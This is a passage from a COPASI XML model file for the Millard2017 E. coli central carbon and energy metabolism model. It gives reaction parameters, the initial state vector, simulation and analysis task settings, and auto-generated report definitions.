<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[CYTBO],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[SQR]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[SQR],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[NDHII]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[NDHII],ParameterGroup=Parameters,Parameter=Vmax" value="30.8306" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[NDHII],ParameterGroup=Parameters,Parameter=KeqNDH" value="27.619299999999999" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Values[KeqNDH],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ATP_MAINTENANCE]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ATP_MAINTENANCE],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[XCH_GLC]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[XCH_GLC],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[XCH_GLC],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PIT]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PIT],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PIT],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[XCH_P]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[XCH_P],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[XCH_P],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[XCH_ACE1]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[XCH_ACE1],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[XCH_ACE1],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[_ACE_OUT]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[_ACE_OUT],ParameterGroup=Parameters,Parameter=k1" value="5.5560000000000003e-05" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[XCH_ACE2]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[XCH_ACE2],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[XCH_ACE2],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[GL6P_HYDROLYSIS]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[GL6P_HYDROLYSIS],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[GL6P_HYDROLYSIS],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
</ModelParameterGroup>
</ModelParameterSet>
</ListOfModelParameterSets>
<StateTemplate>
<StateTemplateVariable objectReference="Model_1"/>
<StateTemplateVariable objectReference="Metabolite_73"/>
<StateTemplateVariable objectReference="Metabolite_56"/>
<StateTemplateVariable objectReference="Metabolite_50"/>
<StateTemplateVariable objectReference="Metabolite_28"/>
<StateTemplateVariable objectReference="Metabolite_18"/>
<StateTemplateVariable objectReference="Metabolite_27"/>
<StateTemplateVariable objectReference="Metabolite_12"/>
<StateTemplateVariable objectReference="Metabolite_8"/>
<StateTemplateVariable objectReference="Metabolite_23"/>
<StateTemplateVariable objectReference="Metabolite_0"/>
<StateTemplateVariable objectReference="Metabolite_26"/>
<StateTemplateVariable objectReference="Metabolite_17"/>
<StateTemplateVariable objectReference="Metabolite_20"/>
<StateTemplateVariable objectReference="Metabolite_33"/>
<StateTemplateVariable objectReference="Metabolite_22"/>
<StateTemplateVariable objectReference="Metabolite_48"/>
<StateTemplateVariable objectReference="Metabolite_69"/>
<StateTemplateVariable objectReference="Metabolite_31"/>
<StateTemplateVariable objectReference="Metabolite_11"/>
<StateTemplateVariable objectReference="Metabolite_51"/>
<StateTemplateVariable objectReference="Metabolite_15"/>
<StateTemplateVariable objectReference="Metabolite_38"/>
<StateTemplateVariable objectReference="Metabolite_6"/>
<StateTemplateVariable objectReference="Metabolite_70"/>
<StateTemplateVariable objectReference="Metabolite_72"/>
<StateTemplateVariable objectReference="Metabolite_75"/>
<StateTemplateVariable objectReference="Metabolite_25"/>
<StateTemplateVariable objectReference="Metabolite_36"/>
<StateTemplateVariable objectReference="Metabolite_44"/>
<StateTemplateVariable objectReference="Metabolite_32"/>
<StateTemplateVariable objectReference="Metabolite_1"/>
<StateTemplateVariable objectReference="Metabolite_13"/>
<StateTemplateVariable objectReference="Metabolite_67"/>
<StateTemplateVariable objectReference="Metabolite_34"/>
<StateTemplateVariable objectReference="Metabolite_7"/>
<StateTemplateVariable objectReference="Metabolite_24"/>
<StateTemplateVariable objectReference="Metabolite_16"/>
<StateTemplateVariable objectReference="Metabolite_76"/>
<StateTemplateVariable objectReference="Metabolite_10"/>
<StateTemplateVariable objectReference="Metabolite_35"/>
<StateTemplateVariable objectReference="Metabolite_40"/>
<StateTemplateVariable objectReference="Metabolite_2"/>
<StateTemplateVariable objectReference="Metabolite_4"/>
<StateTemplateVariable objectReference="Metabolite_74"/>
<StateTemplateVariable objectReference="Metabolite_14"/>
<StateTemplateVariable objectReference="Metabolite_30"/>
<StateTemplateVariable objectReference="Metabolite_42"/>
<StateTemplateVariable objectReference="Metabolite_47"/>
<StateTemplateVariable objectReference="Metabolite_5"/>
<StateTemplateVariable objectReference="Metabolite_52"/>
<StateTemplateVariable objectReference="Metabolite_3"/>
<StateTemplateVariable objectReference="Metabolite_9"/>
<StateTemplateVariable objectReference="Metabolite_53"/>
<StateTemplateVariable objectReference="Metabolite_43"/>
<StateTemplateVariable objectReference="Metabolite_39"/>
<StateTemplateVariable objectReference="Metabolite_46"/>
<StateTemplateVariable objectReference="Metabolite_45"/>
<StateTemplateVariable objectReference="Metabolite_41"/>
<StateTemplateVariable objectReference="Metabolite_29"/>
<StateTemplateVariable objectReference="Metabolite_19"/>
<StateTemplateVariable objectReference="Metabolite_21"/>
<StateTemplateVariable objectReference="Metabolite_68"/>
<StateTemplateVariable objectReference="Metabolite_49"/>
<StateTemplateVariable objectReference="Metabolite_37"/>
<StateTemplateVariable objectReference="Metabolite_58"/>
<StateTemplateVariable objectReference="Metabolite_59"/>
<StateTemplateVariable objectReference="Metabolite_60"/>
<StateTemplateVariable objectReference="Metabolite_54"/>
<StateTemplateVariable objectReference="Metabolite_55"/>
<StateTemplateVariable objectReference="Metabolite_57"/>
<StateTemplateVariable objectReference="Metabolite_61"/>
<StateTemplateVariable objectReference="Metabolite_62"/>
<StateTemplateVariable objectReference="Metabolite_63"/>
<StateTemplateVariable objectReference="Metabolite_64"/>
<StateTemplateVariable objectReference="Metabolite_65"/>
<StateTemplateVariable objectReference="Metabolite_66"/>
<StateTemplateVariable objectReference="Metabolite_71"/>
<StateTemplateVariable objectReference="Compartment_0"/>
<StateTemplateVariable objectReference="Compartment_1"/>
<StateTemplateVariable objectReference="Compartment_2"/>
<StateTemplateVariable objectReference="ModelValue_0"/>
<StateTemplateVariable objectReference="ModelValue_1"/>
<StateTemplateVariable objectReference="ModelValue_2"/>
<StateTemplateVariable objectReference="ModelValue_3"/>
<StateTemplateVariable objectReference="ModelValue_4"/>
<StateTemplateVariable objectReference="ModelValue_5"/>
<StateTemplateVariable objectReference="ModelValue_6"/>
<StateTemplateVariable objectReference="ModelValue_7"/>
</StateTemplate>
<InitialState type="initialState">
0 8091472453256321 5.8799869312313674e+21 3.6031354180883579e+20 1.9639248234274043e+20 8.5005146998199353e+20 1.4265932662081769e+20 7.0569319205180695e+19 1.5763946066185716e+20 6.0043053493910241e+20 9.3188417393280467e+19 7.9251241914975207e+19 6.2157714956357455e+20 1.0107393022490749e+20 1.3011154186902826e+20 7.698680164822324e+19 8.3290922824539628e+18 1.1243807689168963e+17 2.0585278619139365e+20 5.1858431598197925e+20 1.1216394702819669e+20 6.3703667072070214e+19 8.5525575608716513e+18 2.6322420431957092e+20 3.8140444595268072e+20 1.1242558416077754e+19 1.5054491124235709e+21 4.193061098189998e+20 2.0114735423457258e+17 3.268479698336007e+17 8.5505452688743842e+19 1.9361063506980811e+19 1.9642127972845123e+18 1.5291076608469261e+20 2.474363866819711e+19 7.9070668605878026e+19 2.2781584503402476e+20 5.2282835243426587e+19 28107957631558488 1.2834084187950583e+20 3.0473116183618054e+20 28419065176204708 8.6664191621497897e+18 3.9391164070065283e+19 6.0723801560420096e+17 5.3057531901769871e+18 6.4341569172230717e+19 1.1515043650212757e+17 3.4458121569610027e+19 5.3916512352148431e+19 1.5490159511281688e+21 3.6004593044112428e+20 1.6970884333545056e+20 5.5592272342984884e+20 3.1621128357967836e+18 2.8940514631167993e+20 1.6747235514063363e+18 3.0988284800748687e+19 2.0633142966785149e+17 4.0582160314737531e+20 9.5424644986276282e+19 5.3695089575660012e+19 4.4930331966157731e+20 3.3825893667480527e+19 3.8428260841912832e+18 1.581911401402443e+20 1.42797586195125e+21 2.4920534997863522e+19 3.0110704285000001e+20 8.4309971997999995e+20 6.0221408570000002e+20 7.0459048026900044e+20 5.1188197284500005e+19 1.8066422571000001e+20 19043681497464356 6.0221408570000002e+20 1.26464957997e+20 6.0221408570000002e+23 1 100 0.25 0.23000000000000001 1.2777099999999999 0.084763400000000003 5.8099999999999996 9.3135200000000005 0.062888200000000005 0.02001 27.619299999999999
</InitialState>
</Model>
<ListOfTasks>
<Task key="Task_15" name="Steady-State" type="steadyState" scheduled="false" updateModel="false">
<Report reference="Report_11" target="" append="1" confirmOverwrite="1"/>
<Problem>
<Parameter name="JacobianRequested" type="bool" value="1"/>
<Parameter name="StabilityAnalysisRequested" type="bool" value="1"/>
</Problem>
<Method name="Enhanced Newton" type="EnhancedNewton">
<Parameter name="Resolution" type="unsignedFloat" value="1.0000000000000001e-09"/>
<Parameter name="Derivation Factor" type="unsignedFloat" value="0.001"/>
<Parameter name="Use Newton" type="bool" value="1"/>
<Parameter name="Use Integration" type="bool" value="1"/>
<Parameter name="Use Back Integration" type="bool" value="0"/>
<Parameter name="Accept Negative Concentrations" type="bool" value="0"/>
<Parameter name="Iteration Limit" type="unsignedInteger" value="50"/>
<Parameter name="Maximum duration for forward integration" type="unsignedFloat" value="1000000000"/>
<Parameter name="Maximum duration for backward integration" type="unsignedFloat" value="1000000"/>
<Parameter name="Target Criterion" type="string" value="Distance and Rate"/>
</Method>
</Task>
<Task key="Task_16" name="Time-Course" type="timeCourse" scheduled="false" updateModel="false">
<Report reference="Report_12" target="" append="1" confirmOverwrite="1"/>
<Problem>
<Parameter name="AutomaticStepSize" type="bool" value="0"/>
<Parameter name="StepNumber" type="unsignedInteger" value="100"/>
<Parameter name="StepSize" type="float" value="0.01"/>
<Parameter name="Duration" type="float" value="1"/>
<Parameter name="TimeSeriesRequested" type="bool" value="1"/>
<Parameter name="OutputStartTime" type="float" value="0"/>
<Parameter name="Output Event" type="bool" value="0"/>
<Parameter name="Start in Steady State" type="bool" value="0"/>
<Parameter name="Use Values" type="bool" value="0"/>
<Parameter name="Values" type="string" value=""/>
</Problem>
<Method name="Deterministic (LSODA)" type="Deterministic(LSODA)">
<Parameter name="Integrate Reduced Model" type="bool" value="0"/>
<Parameter name="Relative Tolerance" type="unsignedFloat" value="9.9999999999999995e-07"/>
<Parameter name="Absolute Tolerance" type="unsignedFloat" value="9.9999999999999998e-13"/>
<Parameter name="Max Internal Steps" type="unsignedInteger" value="100000"/>
<Parameter name="Max Internal Step Size" type="unsignedFloat" value="0"/>
</Method>
</Task>
<Task key="Task_17" name="Scan" type="scan" scheduled="false" updateModel="false">
<Problem>
<Parameter name="Subtask" type="unsignedInteger" value="1"/>
<ParameterGroup name="ScanItems">
</ParameterGroup>
<Parameter name="Output in subtask" type="bool" value="1"/>
<Parameter name="Adjust initial conditions" type="bool" value="0"/>
<Parameter name="Continue on Error" type="bool" value="0"/>
</Problem>
<Method name="Scan Framework" type="ScanFramework">
</Method>
</Task>
<Task key="Task_18" name="Elementary Flux Modes" type="fluxMode" scheduled="true" updateModel="false">
<Report reference="Report_22" target="Ecoli_efm.out" append="1" confirmOverwrite="0"/>
<Problem>
</Problem>
<Method name="EFM Algorithm" type="EFMAlgorithm">
</Method>
</Task>
<Task key="Task_19" name="Optimization" type="optimization" scheduled="false" updateModel="false">
<Report reference="Report_14" target="" append="1" confirmOverwrite="1"/>
<Problem>
<Parameter name="Subtask" type="cn" value="CN=Root,Vector=TaskList[Steady-State]"/>
<ParameterText name="ObjectiveExpression" type="expression">
</ParameterText>
<Parameter name="Maximize" type="bool" value="0"/>
<Parameter name="Randomize Start Values" type="bool" value="0"/>
<Parameter name="Calculate Statistics" type="bool" value="1"/>
<ParameterGroup name="OptimizationItemList">
</ParameterGroup>
<ParameterGroup name="OptimizationConstraintList">
</ParameterGroup>
</Problem>
<Method name="Random Search" type="RandomSearch">
<Parameter name="Log Verbosity" type="unsignedInteger" value="0"/>
<Parameter name="Number of Iterations" type="unsignedInteger" value="100000"/>
<Parameter name="Random Number Generator" type="unsignedInteger" value="1"/>
<Parameter name="Seed" type="unsignedInteger" value="0"/>
</Method>
</Task>
<Task key="Task_20" name="Parameter Estimation" type="parameterFitting" scheduled="false" updateModel="false">
<Report reference="Report_15" target="" append="1" confirmOverwrite="1"/>
<Problem>
<Parameter name="Maximize" type="bool" value="0"/>
<Parameter name="Randomize Start Values" type="bool" value="0"/>
<Parameter name="Calculate Statistics" type="bool" value="1"/>
<ParameterGroup name="OptimizationItemList">
</ParameterGroup>
<ParameterGroup name="OptimizationConstraintList">
</ParameterGroup>
<Parameter name="Steady-State" type="cn" value="CN=Root,Vector=TaskList[Steady-State]"/>
<Parameter name="Time-Course" type="cn" value="CN=Root,Vector=TaskList[Time-Course]"/>
<Parameter name="Create Parameter Sets" type="bool" value="0"/>
<Parameter name="Use Time Sens" type="bool" value="0"/>
<Parameter name="Time-Sens" type="cn" value=""/>
<ParameterGroup name="Experiment Set">
</ParameterGroup>
<ParameterGroup name="Validation Set">
<Parameter name="Weight" type="unsignedFloat" value="1"/>
<Parameter name="Threshold" type="unsignedInteger" value="5"/>
</ParameterGroup>
</Problem>
<Method name="Evolutionary Programming" type="EvolutionaryProgram">
<Parameter name="Log Verbosity" type="unsignedInteger" value="0"/>
<Parameter name="Number of Generations" type="unsignedInteger" value="200"/>
<Parameter name="Population Size" type="unsignedInteger" value="20"/>
<Parameter name="Random Number Generator" type="unsignedInteger" value="1"/>
<Parameter name="Seed" type="unsignedInteger" value="0"/>
<Parameter name="Stop after # Stalled Generations" type="unsignedInteger" value="0"/>
</Method>
</Task>
<Task key="Task_21" name="Metabolic Control Analysis" type="metabolicControlAnalysis" scheduled="false" updateModel="false">
<Report reference="Report_16" target="" append="1" confirmOverwrite="1"/>
<Problem>
<Parameter name="Steady-State" type="key" value="Task_15"/>
</Problem>
<Method name="MCA Method (Reder)" type="MCAMethod(Reder)">
<Parameter name="Modulation Factor" type="unsignedFloat" value="1.0000000000000001e-09"/>
<Parameter name="Use Reder" type="bool" value="1"/>
<Parameter name="Use Smallbone" type="bool" value="1"/>
</Method>
</Task>
<Task key="Task_22" name="Lyapunov Exponents" type="lyapunovExponents" scheduled="false" updateModel="false">
<Report reference="Report_17" target="" append="1" confirmOverwrite="1"/>
<Problem>
<Parameter name="ExponentNumber" type="unsignedInteger" value="3"/>
<Parameter name="DivergenceRequested" type="bool" value="1"/>
<Parameter name="TransientTime" type="float" value="0"/>
</Problem>
<Method name="Wolf Method" type="WolfMethod">
<Parameter name="Orthonormalization Interval" type="unsignedFloat" value="1"/>
<Parameter name="Overall time" type="unsignedFloat" value="1000"/>
<Parameter name="Relative Tolerance" type="unsignedFloat" value="9.9999999999999995e-07"/>
<Parameter name="Absolute Tolerance" type="unsignedFloat" value="9.9999999999999998e-13"/>
<Parameter name="Max Internal Steps" type="unsignedInteger" value="10000"/>
</Method>
</Task>
<Task key="Task_23" name="Time Scale Separation Analysis" type="timeScaleSeparationAnalysis" scheduled="false" updateModel="false">
<Report reference="Report_18" target="" append="1" confirmOverwrite="1"/>
<Problem>
<Parameter name="StepNumber" type="unsignedInteger" value="100"/>
<Parameter name="StepSize" type="float" value="0.01"/>
<Parameter name="Duration" type="float" value="1"/>
<Parameter name="TimeSeriesRequested" type="bool" value="1"/>
<Parameter name="OutputStartTime" type="float" value="0"/>
</Problem>
<Method name="ILDM (LSODA,Deuflhard)" type="TimeScaleSeparation(ILDM,Deuflhard)">
<Parameter name="Deuflhard Tolerance" type="unsignedFloat" value="0.0001"/>
</Method>
</Task>
<Task key="Task_24" name="Sensitivities" type="sensitivities" scheduled="false" updateModel="false">
<Report reference="Report_19" target="" append="1" confirmOverwrite="1"/>
<Problem>
<Parameter name="SubtaskType" type="unsignedInteger" value="1"/>
<ParameterGroup name="TargetFunctions">
<Parameter name="SingleObject" type="cn" value=""/>
<Parameter name="ObjectListType" type="unsignedInteger" value="7"/>
</ParameterGroup>
<ParameterGroup name="ListOfVariables">
<ParameterGroup name="Variables">
<Parameter name="SingleObject" type="cn" value=""/>
<Parameter name="ObjectListType" type="unsignedInteger" value="41"/>
</ParameterGroup>
<ParameterGroup name="Variables">
<Parameter name="SingleObject" type="cn" value=""/>
<Parameter name="ObjectListType" type="unsignedInteger" value="0"/>
</ParameterGroup>
</ParameterGroup>
</Problem>
<Method name="Sensitivities Method" type="SensitivitiesMethod">
<Parameter name="Delta factor" type="unsignedFloat" value="0.001"/>
<Parameter name="Delta minimum" type="unsignedFloat" value="9.9999999999999998e-13"/>
</Method>
</Task>
<Task key="Task_25" name="Moieties" type="moieties" scheduled="false" updateModel="false">
<Report reference="Report_20" target="" append="1" confirmOverwrite="1"/>
<Problem>
</Problem>
<Method name="Householder Reduction" type="Householder">
</Method>
</Task>
<Task key="Task_26" name="Cross Section" type="crosssection" scheduled="false" updateModel="false">
<Problem>
<Parameter name="AutomaticStepSize" type="bool" value="0"/>
<Parameter name="StepNumber" type="unsignedInteger" value="100"/>
<Parameter name="StepSize" type="float" value="0.01"/>
<Parameter name="Duration" type="float" value="1"/>
<Parameter name="TimeSeriesRequested" type="bool" value="1"/>
<Parameter name="OutputStartTime" type="float" value="0"/>
<Parameter name="Output Event" type="bool" value="0"/>
<Parameter name="Start in Steady State" type="bool" value="0"/>
<Parameter name="Use Values" type="bool" value="0"/>
<Parameter name="Values" type="string" value=""/>
<Parameter name="LimitCrossings" type="bool" value="0"/>
<Parameter name="NumCrossingsLimit" type="unsignedInteger" value="0"/>
<Parameter name="LimitOutTime" type="bool" value="0"/>
<Parameter name="LimitOutCrossings" type="bool" value="0"/>
<Parameter name="PositiveDirection" type="bool" value="1"/>
<Parameter name="NumOutCrossingsLimit" type="unsignedInteger" value="0"/>
<Parameter name="LimitUntilConvergence" type="bool" value="0"/>
<Parameter name="ConvergenceTolerance" type="float" value="0"/>
<Parameter name="Threshold" type="float" value="0"/>
<Parameter name="DelayOutputUntilConvergence" type="bool" value="0"/>
<Parameter name="OutputConvergenceTolerance" type="float" value="0"/>
<ParameterText name="TriggerExpression" type="expression">
</ParameterText>
<Parameter name="SingleVariable" type="cn" value=""/>
</Problem>
<Method name="Deterministic (LSODA)" type="Deterministic(LSODA)">
<Parameter name="Integrate Reduced Model" type="bool" value="0"/>
<Parameter name="Relative Tolerance" type="unsignedFloat" value="9.9999999999999995e-07"/>
<Parameter name="Absolute Tolerance" type="unsignedFloat" value="9.9999999999999998e-13"/>
<Parameter name="Max Internal Steps" type="unsignedInteger" value="100000"/>
<Parameter name="Max Internal Step Size" type="unsignedFloat" value="0"/>
</Method>
</Task>
<Task key="Task_27" name="Linear Noise Approximation" type="linearNoiseApproximation" scheduled="false" updateModel="false">
<Report reference="Report_21" target="" append="1" confirmOverwrite="1"/>
<Problem>
<Parameter name="Steady-State" type="key" value="Task_15"/>
</Problem>
<Method name="Linear Noise Approximation" type="LinearNoiseApproximation">
</Method>
</Task>
<Task key="Task_28" name="Time-Course Sensitivities" type="timeSensitivities" scheduled="false" updateModel="false">
<Problem>
<Parameter name="AutomaticStepSize" type="bool" value="0"/>
<Parameter name="StepNumber" type="unsignedInteger" value="100"/>
<Parameter name="StepSize" type="float" value="0.01"/>
<Parameter name="Duration" type="float" value="1"/>
<Parameter name="TimeSeriesRequested" type="bool" value="1"/>
<Parameter name="OutputStartTime" type="float" value="0"/>
<Parameter name="Output Event" type="bool" value="0"/>
<Parameter name="Start in Steady State" type="bool" value="0"/>
<Parameter name="Use Values" type="bool" value="0"/>
<Parameter name="Values" type="string" value=""/>
<ParameterGroup name="ListOfParameters">
</ParameterGroup>
<ParameterGroup name="ListOfTargets">
</ParameterGroup>
</Problem>
<Method name="LSODA Sensitivities" type="Sensitivities(LSODA)">
<Parameter name="Integrate Reduced Model" type="bool" value="0"/>
<Parameter name="Relative Tolerance" type="unsignedFloat" value="9.9999999999999995e-07"/>
<Parameter name="Absolute Tolerance" type="unsignedFloat" value="9.9999999999999998e-13"/>
<Parameter name="Max Internal Steps" type="unsignedInteger" value="10000"/>
<Parameter name="Max Internal Step Size" type="unsignedFloat" value="0"/>
</Method>
</Task>
</ListOfTasks>
<ListOfReports>
<Report key="Report_11" name="Steady-State" taskType="steadyState" separator="	" precision="6">
<Comment>
Automatically generated report.
</Comment>
<Footer>
<Object cn="CN=Root,Vector=TaskList[Steady-State]"/>
</Footer>
</Report>
<Report key="Report_12" name="Time-Course" taskType="timeCourse" separator="	" precision="6">
<Comment>
Automatically generated report.
</Comment>
<Header>
<Object cn="CN=Root,Vector=TaskList[Time-Course],Object=Description"/>
</Header>
<Footer>
<Object cn="CN=Root,Vector=TaskList[Time-Course],Object=Result"/>
</Footer>
</Report>
<Report key="Report_13" name="Elementary Flux Modes" taskType="fluxMode" separator="	" precision="6">
<Comment>
Automatically generated report.
</Comment>
<Footer>
<Object cn="CN=Root,Vector=TaskList[Elementary Flux Modes],Object=Result"/>
</Footer>
</Report>
<Report key="Report_14" name="Optimization" taskType="optimization" separator="	" precision="6">
<Comment>
Automatically generated report.
</Comment>
<Header>
<Object cn="CN=Root,Vector=TaskList[Optimization],Object=Description"/>
<Object cn="String=\[Function Evaluations\]"/>
<Object cn="Separator=	"/>
<Object cn="String=\[Best Value\]"/>
<Object cn="Separator=	"/>
<Object cn="String=\[Best Parameters\]"/>
</Header>
<Body>
<Object cn="CN=Root,Vector=TaskList[Optimization],Problem=Optimization,Reference=Function Evaluations"/>
<Object cn="Separator=	"/>
<Object cn="CN=Root,Vector=TaskList[Optimization],Problem=Optimization,Reference=Best Value"/>
<Object cn="Separator=	"/>
<Object cn="CN=Root,Vector=TaskList[Optimization],Problem=Optimization,Reference=Best Parameters"/>
</Body>
<Footer>
<Object cn="String=
"/>
<Object cn="CN=Root,Vector=TaskList[Optimization],Object=Result"/>
</Footer>
</Report>
<Report key="Report_15" name="Parameter Estimation" taskType="parameterFitting" separator="	" precision="6">
<Comment>
Automatically generated report.
</Comment>
<Header>
<Object cn="CN=Root,Vector=TaskList[Parameter Estimation],Object=Description"/>
<Object cn="String=\[Function Evaluations\]"/>
<Object cn="Separator=	"/>
<Object cn="String=\[Best Value\]"/>
<Object cn="Separator=	"/>
<Object cn="String=\[Best Parameters\]"/>
</Header>
<Body>
<Object cn="CN=Root,Vector=TaskList[Parameter Estimation],Problem=Parameter Estimation,Reference=Function Evaluations"/>
<Object cn="Separator=	"/>
<Object cn="CN=Root,Vector=TaskList[Parameter Estimation],Problem=Parameter Estimation,Reference=Best Value"/>
<Object cn="Separator=	"/>
<Object cn="CN=Root,Vector=TaskList[Parameter Estimation],Problem=Parameter Estimation,Reference=Best Parameters"/>
</Body>
<Footer>
<Object cn="String=
"/>
<Object cn="CN=Root,Vector=TaskList[Parameter Estimation],Object=Result"/>
</Footer>
</Report>
<Report key="Report_16" name="Metabolic Control Analysis" taskType="metabolicControlAnalysis" separator="	" precision="6">
<Comment>
Automatically generated report.
</Comment>
<Header>
<Object cn="CN=Root,Vector=TaskList[Metabolic Control Analysis],Object=Description"/>
</Header>
<Footer>
<Object cn="String=
"/>
<Object cn="CN=Root,Vector=TaskList[Metabolic Control Analysis],Object=Result"/>
</Footer>
</Report>
<Report key="Report_17" name="Lyapunov Exponents" taskType="lyapunovExponents" separator="	" precision="6">
<Comment>
Automatically generated report.
</Comment>
<Header>
<Object cn="CN=Root,Vector=TaskList[Lyapunov Exponents],Object=Description"/>
</Header>
<Footer>
<Object cn="String=
"/>
<Object cn="CN=Root,Vector=TaskList[Lyapunov Exponents],Object=Result"/>
</Footer>
</Report>
<Report key="Report_18" name="Time Scale Separation Analysis" taskType="timeScaleSeparationAnalysis" separator="	" precision="6">
<Comment>
Automatically generated report.
</Comment>
<Header>
<Object cn="CN=Root,Vector=TaskList[Time Scale Separation Analysis],Object=Description"/>
</Header>
<Footer>
<Object cn="String=
"/>
<Object cn="CN=Root,Vector=TaskList[Time Scale Separation Analysis],Object=Result"/>
</Footer>
</Report>
<Report key="Report_19" name="Sensitivities" taskType="sensitivities" separator="	" precision="6">
<Comment>
Automatically generated report.
</Comment>
<Header>
<Object cn="CN=Root,Vector=TaskList[Sensitivities],Object=Description"/>
</Header>
<Footer>
<Object cn="String=
"/>
<Object cn="CN=Root,Vector=TaskList[Sensitivities],Object=Result"/>
</Footer>
</Report>
<Report key="Report_20" name="Moieties" taskType="moieties" separator="	" precision="6">
<Comment>
Automatically generated report.
</Comment>
<Header>
<Object cn="CN=Root,Vector=TaskList[Moieties],Object=Description"/>
</Header>
<Footer>
<Object cn="String=
"/>
<Object cn="CN=Root,Vector=TaskList[Moieties],Object=Result"/>
</Footer>
</Report>
<Report key="Report_21" name="Linear Noise Approximation" taskType="linearNoiseApproximation" separator="	" precision="6">
<Comment>
Automatically generated report.
</Comment>
<Header>
<Object cn="CN=Root,Vector=TaskList[Linear Noise Approximation],Object=Description"/>
</Header>
<Footer>
<Object cn="String=
"/>
<Object cn="CN=Root,Vector=TaskList[Linear Noise Approximation],Object=Result"/>
</Footer>
</Report>
<Report key="Report_22" name="Speed test" taskType="fluxMode" separator="	" precision="8">
<Comment>
</Comment>
<Footer>
<Object cn="CN=Root,CN=Information,String=COPASI Version"/>
<Object cn="Separator=	"/>
<Object cn="CN=Root,CN=Information,Timer=Current Date/Time"/>
<Object cn="String=
"/>
<Object cn="CN=Root,Timer=CPU Time"/>
</Footer>
</Report>
</ListOfReports>
<GUI>
</GUI>
<ListOfUnitDefinitions>
<UnitDefinition key="Unit_1" name="meter" symbol="m">
<MiriamAnnotation>
<rdf:RDF
xmlns:dcterms="http://purl.org/dc/terms/"
